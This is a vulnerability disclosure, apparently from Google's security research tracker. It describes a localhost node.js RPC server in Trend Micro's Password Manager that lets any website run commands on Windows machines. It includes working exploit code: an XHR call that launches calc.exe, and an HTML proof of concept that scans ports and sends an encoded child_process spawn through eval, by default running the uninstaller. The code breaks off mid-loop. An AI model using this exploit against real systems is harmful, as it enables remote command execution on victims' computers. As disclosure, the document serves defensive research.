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TrendMicro node.js HTTP Server Listening on localhost Can Execute Commands
来源:https://code.google.com/p/google-security-research 作者:Google 发布时间:2016-01-12  
Source: https://code.google.com/p/google-security-research/issues/detail?id=693
When you install TrendMicro Antivirus on Windows, by default a component called Password Manager is also installed and automatically launched on startup.
This product is primarily written in JavaScript with node.js, and opens multiple HTTP RPC ports for handling API requests.
It took about 30 seconds to spot one that permits arbitrary command execution, openUrlInDefaultBrowser, which eventually maps to ShellExecute().
This means any website can launch arbitrary commands, like this:
x = new XMLHttpRequest()
x.open("GET", "https://localhost:49155/api/openUrlInDefaultBrowser?url=c:/windows/system32/calc.exe true);
try { x.send(); } catch (e) {};
(Note that you cannot read the response due to the same origin policy, but it doesn't matter - the command is still executed).
    <title>Trend Micro Maximum Security 10 Exploit</title>
    Sample exploit for Trend Micro Maximum Security 10.
    -- Tavis Ormandy.
    Command: <input id="command" value="C:/PROGRA~1/TRENDM~1/Titanium/Remove.exe" size="64">
    <a href="javascript:begin()">Click Here</a> to run the command above (the default will uninstall Trend Micro Maximum).
    <img src="http://reactiongifs.us/wp-content/uploads/2013/02/awesome_to_the_max.gif">
    function begin() {
        // The command you want to run, arguments will work but don't use single quotes.
        // Lets uninstall Trend Micro.
        var cmd  = document.getElementById('command').value;
        // Start port, Trend Micro trys top open a port starting here until it works.
        var port = 49155;
        // Wrapper code to start cmd.
        var code = "topWindow.require('child_process').spawn('cmd', [ '/c', '" + cmd + "' ])"
        // We can't send quotes, so encode that via character codes.
        code = code.split('').map(function(a){ return a.charCodeAt(0) }).join(',');
        // Create the XHR's
        for (; port <= 49160; port++) {
            var x = new XMLHttpRequest();
            x.open('GET', 'https://localhost:' + port + '/api/showSB?url=javascript:eval(String.fromCharCode(' + code + '))', false);
            // We can't tell if it worked because of the cross domain policy.
            try { x.send(); } catch (e) {};
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